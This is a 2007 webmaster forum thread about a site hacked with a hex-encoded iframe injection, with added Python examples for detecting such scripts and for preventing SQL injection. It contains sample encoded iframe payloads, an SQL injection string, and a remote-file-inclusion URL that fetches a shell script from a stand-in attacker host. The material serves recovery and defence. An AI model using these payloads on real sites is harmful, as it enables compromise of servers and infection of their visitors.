Forum Moderators: Robert Charlton & goodroi
The referrer is as follows: "http://www.google.dk/interstitial?url=http://www.mysite
The site in question currently has a PR6 and contains nothing but plain text pages.
Does anyone have any idea how this can happen?
Thank you in advance.
For the last two hours or so, I have been in a cold sweat out of fear of being banned by Google.
The site in question is my cherished one, and is performing excellently (at #2 or #3) for many keywords.
Upon checking, I noticed that a javascript code was inserted at the beginning of my index.html page (before the <head> tag). The code is a hexadecimal code. When converted to ASCII, it reveals an iframe pointing to an internet address that attempts to download a program (that crashes on my ME system).
Also, I noticed that the page was modified on March 2nd. That is to say, my homepage has been running with that code for the last 10 days!
I immediately removed the code, and reported it to stopbadware.org.
Now, I am really trembling lest it harm my site's ranking in the eyes of Google permanently. ):
I removed the IP address - we don't want to spread viruses here either!
[edited by: tedster at 2:41 am (utc) on Mar. 13, 2007]
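The injection described in the post above is a script placed before the <head> tag whose string is hex-encoded and, once decoded, writes an iframe. The following is an added example (not code from any poster in this thread) that scans HTML for the common encodings of that trick (percent escapes passed to unescape(), \xNN escapes in a string literal, String.fromCharCode) and reports every iframe the decoded script would write, together with whether the script sits before the <head> tag. The sample page and the iframe URL in it are constructed here and are placeholders, not the address from the original report.

```python
"""Scan static HTML for hex-escaped JavaScript that writes an <iframe>."""
import os
import re
import tempfile

# Constructed payload: the kind of tag the decoded script writes. Placeholder URL.
INJECTED_IFRAME = '<iframe src="http://bad.example/x.php" width=1 height=1></iframe>'


def percent_encode(s: str) -> str:
    """Encode as %XX escapes, the form fed to JavaScript's unescape()."""
    return "".join("%%%02X" % b for b in s.encode("ascii"))


def js_hex_encode(s: str) -> str:
    """Encode as \\xXX escapes inside a JavaScript string literal."""
    return "".join("\\x%02X" % b for b in s.encode("ascii"))


# Constructed index.html: one script before <head> (as in the report), one in the body.
SAMPLE_PAGE = (
    '<script>document.write(unescape("%s"))</script>\n'
    '<html><head><title>Plain text site</title></head>\n'
    '<body><p>Welcome.</p>\n'
    '<script>document.write("%s")</script></body></html>\n'
) % (percent_encode(INJECTED_IFRAME), js_hex_encode(INJECTED_IFRAME))

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.I | re.S)
PCT_RE = re.compile(r"(?:%[0-9A-Fa-f]{2}){4,}")           # %3C%69%66...
JSHEX_RE = re.compile(r"(?:\\x[0-9A-Fa-f]{2}){4,}")        # \x3C\x69\x66...
CHARCODE_RE = re.compile(r"String\.fromCharCode\(([\d,\s]+)\)")
IFRAME_RE = re.compile(r"<iframe[^>]*\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)


def decode_escapes(js: str) -> str:
    """Return script text with hex-escaped runs replaced by their ASCII form."""
    out = PCT_RE.sub(lambda m: bytes.fromhex(m.group(0).replace("%", "")).decode("latin-1"), js)
    out = JSHEX_RE.sub(lambda m: bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1"), out)
    out = CHARCODE_RE.sub(
        lambda m: "".join(chr(int(c)) for c in m.group(1).split(",") if c.strip()), out)
    return out


def find_injected_iframes(html: str):
    """Return one dict per iframe written by a script block, with its src and position."""
    head_pos = html.lower().find("<head")
    findings = []
    for m in SCRIPT_RE.finditer(html):
        decoded = decode_escapes(m.group(1))
        for src in IFRAME_RE.findall(decoded):
            findings.append({
                "src": src,
                "before_head": head_pos == -1 or m.start() < head_pos,
                "decoded": decoded,
            })
    return findings


def scan_web_root(root: str):
    """Walk a web root and report every index.* file that writes a hidden iframe."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index."):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                hits = find_injected_iframes(fh.read())
            if hits:
                report[path] = [h["src"] for h in hits]
    return report


def demo_scan():
    """Write the constructed page into a throwaway web root and scan it."""
    root = tempfile.mkdtemp(prefix="webroot-")
    with open(os.path.join(root, "index.html"), "w") as fh:
        fh.write(SAMPLE_PAGE)
    with open(os.path.join(root, "index.htm"), "w") as fh:
        fh.write("<html><head></head><body>clean page</body></html>")
    return scan_web_root(root)


if __name__ == "__main__":
    for path, srcs in demo_scan().items():
        print(path, "->", srcs)
```

The decoder only undoes the three encodings listed; a script that builds its string by other means (arithmetic, split/join, a second layer of eval) will not be flagged, so treat a clean result as "nothing of this shape found", not as proof the file is clean. Comparing each file's modification time and a checksum against your own copy, as the poster did by noticing the March 2nd change, is the more reliable check.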
The iframe code is not in our files ... but it still appears on users' computers, above our HTML code.
How did you solve it?
I read your post. It seems somehow different. In my case, it is isolated to a single html file (hopefully), and therefore easily corrected. I simply removed the virus loading script from the html page. That is to say, my page is not infected. It only attempts to download the virus onto the user's computer. On the other hand, your server seems infected. I cannot call myself knowledgeable, but I think that you may need some virus checking software on the server side.
We had to clean up the whole server and even buy another one just in case. It was a nightmare for 15 days (from the end of February to a week ago).
I am still not sure how they managed to do that, so many times, randomly, for so long, with 3 server admins sniffing around.
It attacked static files ending in *index.*; all accounts were infected at the same time.
The iframe was redirecting to sites in Russia. I still can't figure out why/how/when these sites will be banned forever, not talking about banning from Google but removing the privilege of operating a domain.
If someone has more info about the procedures these hackers use, it would be welcome, I guess.
Tedster >> great info as usual.
Upon checking, I noticed that a javascript code was inserted at the beginning of my index.html page (before the <head> tag).
and, in a later message:
I read your post. It seems somehow different. In my case, it is isolated to a single html file (hopefully), and therefore easily corrected. I simply removed the virus loading script from the html page. That is to say, my page is not infected.
Someone gained access to your machine. The attacker had (probably still has) the right to change files on your machine. This particular file seems to be clean at this moment, but you don't know what else they are doing that you are NOT seeing at this point.
Typical intrusion points are insecure PHP scripts and forms.
Please consider what someone can do who has file writing privileges on your server:
- use your machine as a storage space for file sharing (read: distribute illegal copies of new movies)
- use your machine to store and share child porn
- use your machine to send out millions of spam mails
- add your machine to a botnet and rent it for attacks (as in: blackmailing online businesses with DDOS attacks)
- download confidential info from your machine like credit card info, passwords
- use your machine as a landing platform for online fraud
They could also use a new email account @your-machine.com.
You, as the owner of the machine, will be held responsible for all this.
Security has been breached on your system. There is only ONE reasonable reaction to this. As the system is compromised, it ought to be set up again from scratch, which means above all else that the underlying operating system must be re-installed. Afterwards, your HTML files can be copied back onto the machine.
Thank you for your comments. In fact, the affected page is a static html file. It contains no php script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.
After the hack, even if my ranking is not affected, it is certain that my site's image will suffer for the duration of the warning notice. Being a spammer or a malware owner in the eyes of visitors is not something to be welcomed.
When it comes to punishing, Google is really quick to act. But, as an innocent victim of a malicious attack, I would like to be warned before a warning notice is placed for surfers. This could be considered at least for those webmasters who already have an account with Google through Webmaster Tools, AdWords, or AdSense. Google has my full contact details, and if Google had sent me a message (automatic or not), I would have immediately removed the injected code, and been very grateful indeed.
Now, I have to resort to a roundabout way and wait until someone reviews my site, notifies Google, etc. This, imho, is really sad.
[edited by: tedster at 1:03 am (utc) on Mar. 14, 2007]
Yes Google could have informed you first. OTOH, if not for that warning you'd still be injecting spyware onto people's computers. Bottom line is that they had to do your job for you. I'm not hearing that gratitude.
I got a vicious trojan once because I visited an infected site, which took me days to finally remove. I agree with you, webmasters shouldn't be whining about losing ranking on Google because they weren't notified and the world didn't stop to make sure their feelings weren't hurt. It's up to webmasters to have secure web sites and be vigilant about it. They should be more worried about the hundreds of computers they infected rather than their precious little web sites getting a bad rep.
Changing your password was a good first step. If your password was a bad one, then that would have been an easy (and common) avenue of attack.
If your password was a strong one, then they probably got in by some other method, and that's what you need to investigate.
On second thought, I see that friends like Jomaxx and Koan have a point in saying that notifying the webmaster would not save uninformed surfers. It is probable that the computers of hundreds of visitors were already exposed to the malware due to the injected javascript code on my page before I became aware of the situation.
But I have a reservation here: Google is not the only source of traffic for websites. After Google's malware warning, my traffic dropped by 60%. Now, I receive traffic from other search engines, from relevant directories, forum discussions, etc. So, visitors coming from these sources are not aware of the potential malware, and are therefore exposed to it. Had Google notified me besides placing a warning, the remaining 35% of the visitors could have been saved.
Interestingly, I still receive decent traffic from Google in spite of the warning note. When a visitor clicks a link to my site, he/she is not transferred directly to the site, but instead to a warning page. Some visitors seem to ignore this warning page. I can say that 20% of my current traffic is referred by Google!
- use your machine as a storage space for file sharing (read: distribute illegal copies of new movies)
Any tips on getting people to do this to my server? (dreams of logging in and seeing a library of new movies!)
If I understand correctly, most of the time these hacks point to the exact same sites, and I think that measures should be taken to shut down the companies generating such problems in the first place.
Penalizing webmasters is a temporary solution; shutting down spam networks legally/officially for what they do and preventing them from owning any internet property is the way to go.
Thank you for your comments. In fact, the affected page is a static html file. It contains no php script. As a precaution, I immediately changed the password. But I am researching other possible means to protect the site from further attacks, including resetting my account. From now on, I will closely monitor the site, and at the first indication that there might be similar problems, I will reset the site without hesitation.
Maybe I should explain this a little more extensively. We had a similar problem on our server. It was abused for file sharing though. We had a CMS running, which had a remote file inclusion vulnerability. (Mind you, this is only one example among many many other possibilities). I'll simplify it a little.
The CMS would call a subroutine:
http://www.my-server.com/include=my_subroutine
The input of "my_subroutine" was not sanitized - a flaw in the software. All the attacker had to do was:
http://www.my-server.com/include=http://bad-guy.com/malicious_code.php
"malicious_code" would be, for example, a shell script. This script was stored on my server, and then this guy could call
http://www.my-server.com/malicious_code.php?command=[many nasty things]
So they installed their own server management software by means of a flawed piece of software, and from that moment on they could manipulate the system. Including static html pages like those on your site. In other words, the weak point is NOT the HTML file you are looking at. The problem is somewhere else. Someone gained and most likely still has access to your system, and they are able to do with your files whatever they want. And if they are really really clever they will do it without any obvious sign.
Do you have sensitive information in a MySQL database, like credit card info of your customers? These PHP shell scripts may have MySQL access too. Add a weak MySQL password to this, and they are already selling your confidential info to interested third parties.
Your machine is compromised. You can't trust it any longer.
You may want to google for expressions like "root kit", "r57 shell", "remote file inclusion", then you will get an idea of what happened to your server. The altered html file is but the tip of the iceberg. By means of an additional kernel vulnerability they may have even gained root access. This would mean that they can show you whatever they want, while they are doing something else.
A compromised server in the hands of an unknown attacker is the cyberspace equivalent of a loaded gun in the hands of whoever in a busy mall. Once they have gained access to your system, and they did, they can do ANYTHING. Including sending death threats to the president, if they wish. You'd have a hard time saying "But it wasn't me, it was someone else." It's your system, you are responsible.
Let's assume you're buying something at eBay or Amazon, your credit card info is stolen from their hacked server, and your accounts are billed like crazy. Imagine you complain (Hey, I've only bought this book at $10, not the holiday home at $2,000,000), and they would say: "Oh, we are so sorry, but we are not liable. You see, it was someone else."
I'm sure you get the picture.
BTW the intrusion did not necessarily originate from your own account on that server. If it's virtual hosting, maybe a different web site was hacked, and by means of privilege escalation they are working their way through all accounts on that server now. Maybe you should talk to your provider. If your site is on a dedicated server, and if you are the owner, you should reset it immediately.
[googlewebmastercentral.blogspot.com...]
Google should give a reasonable amount of time for the website owner to fix the problem. Most websites are harmless and they must know that... Penalizing webmasters is a temporary solution.
They're not penalizing the webmaster or the site, just warning surfers. Consider: if your site is trying to infect all its visitors with a virus, do you still want people to come visit it? I would hope not.
Google no doubt knows that more than 99.9% of all websites are non-malicious, and in fact that is probably one test they use to distinguish what constitutes a hack. If your site is about archaeology in Colorado and suddenly sprouts porn links, that's obviously not normal.
torson
That is quite an interesting situation.
I think someone installed badware on my workstation and read the local FTP password database of the FTP program, or was listening to my FTP connection.
Were you using firewall and antivirus software at the time of the hack? Or start using them afterward? The obvious question would be, how would badware get in, with those in place?
Did you find and identify the badware?
[edited by: SteveWh at 11:16 pm (utc) on Mar. 14, 2007]
Was this at work or at least some computer over which you didn't have total control (i.e. not your home PC)?
My computer, no one else is working with
Were you using firewall and antivirus software at the time of the hack? Or start using them afterward? The obvious question would be, how would badware get in, with those in place?
The computer was protected all the time, but it is not obvious, because antivirus programs are always one step behind.
Did you find and identify the badware?
This is what makes me nervous. I used 3 different antivirus programs to check the computer, but I found nothing.
The only connection between the two domains, which are hosted by different providers, is my workstation. There are no scripts running on the domains, only simple, pure HTML pages. The badware on both domains was installed on the same day by updating the index page via FTP. Just one connect, get the file (insert the code by hand? ~1 minute until send), rename the page, send a new page and bye. At the time the problem happened, there were also 4 other domains saved with the complete connection profile in my FTP program. Only two domains were affected. Very strange; I'm not sure what happened, but the only chance to get the passwords was my computer. I think the computer needs a new installation, a lot of work but it's necessary.
I'm always skeptical about password-interception theories, but it is technically possible, so you can't completely discount it.
Since you know the IP address of the hacker (it's in your FTP log), you can block them in .htaccess. That's one line of protection.
But your story is the kind that makes me nervous, too. Strong password. Pure HTML... I'd suggest the possibility of a hacker having gained server-wide access through some other account - but not at two different hosts at once! Or maybe so. Don't know. If you haven't already notified your hosts, it might be worth doing so. They might want to do a sweep of their entire clientele to check for other affected sites.
[edited by: tedster at 7:29 am (utc) on Mar. 15, 2007]
WeirdCode & SteveWH:
Thank you for your insightful comments. Now I am studying some papers on vulnerabilities involving PHP, as my site hosts a dictionary with some PHP code. However, I have a suspect. A free PHP script that I installed recently has an upload option for updating the database. But this updating script is not password protected. I do not know if the coder deliberately left it as it is, but it might be the culprit. So I deleted it.
As to Google's removal of the warning note: I applied to stopbadware.org for a review. But my site's status is still "undetermined" at stopbadware.org. Meanwhile, Google recrawled my site the day before yesterday.
Right now, I see that Google removed the warning note with a fresh cache dated 13th March.
This may mean that after re-crawling and analysing the page, Google chose to remove the note, and did not wait for a report from stopbadware.org. This is really good news for me, and may be good news for anyone concerned.
As a side note, I see a rapid increase in the number of reported sites at stopbadware.org. On 12th Feb, the number of sites reported was around 25,900. Today, I read the number as above 27,300. This means that within just 3 days, around 1500 new sites were reported. This is really alarming.
Maybe your intruder had the same IP (131.229.183.nnn).
selomelo,
I'm glad to hear it was easy to clear up with Google. If the process stays that streamlined, then it will help everyone.
Your suspect sounds like a "possible". If it takes any input from a user, OR from a URL, OR from a cookie, it also needs to "escape" it (clean it) before it uses it for any type of database access, to avoid injection attacks.
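The advice in the post above, that any user-, URL- or cookie-supplied value must be cleaned before it reaches the database, is illustrated below with a word lookup of the kind a dictionary script would do. This is an added example, not code from the thread or from the free PHP script the poster installed; it uses Python's built-in sqlite3 module, and the dictionary table and its rows are constructed here. The "clean" step is shown as a bound parameter, which is what escaping is meant to achieve: the value can never become part of the SQL grammar.

```python
"""Injection through string concatenation, beside the parameterised query that prevents it."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed dictionary table: two published entries and one unpublished draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE dictionary (word TEXT, definition TEXT, published INTEGER)")
    conn.executemany("INSERT INTO dictionary VALUES (?, ?, ?)", [
        ("apple", "a fruit", 1),
        ("banana", "another fruit", 1),
        ("draft", "unpublished entry", 0),
    ])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, word: str):
    """The value from the URL is pasted into the SQL text, so quotes in it rewrite the query."""
    sql = ("SELECT word, definition FROM dictionary "
           "WHERE published = 1 AND word = '" + word + "'")
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, word: str):
    """The value is bound as a parameter; the driver keeps it out of the SQL grammar."""
    return conn.execute(
        "SELECT word, definition FROM dictionary WHERE published = 1 AND word = ?",
        (word,),
    ).fetchall()


# A classic payload: closes the quoted literal and appends an always-true condition.
PAYLOAD = "' OR '1'='1"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, PAYLOAD))   # every row, draft included
    print("safe:      ", lookup_safe(db, PAYLOAD))         # no such word, empty result
```

The vulnerable query turns `published = 1 AND word = '' OR '1'='1'` into "everything", which leaks the unpublished row; with a database user that has write rights, the same hole lets an attacker append statements rather than merely read. Parameterising every query is the fix; if a library only offers an escaping function, apply it to every value, including cookies and hidden form fields, and still prefer bound parameters wherever the driver supports them.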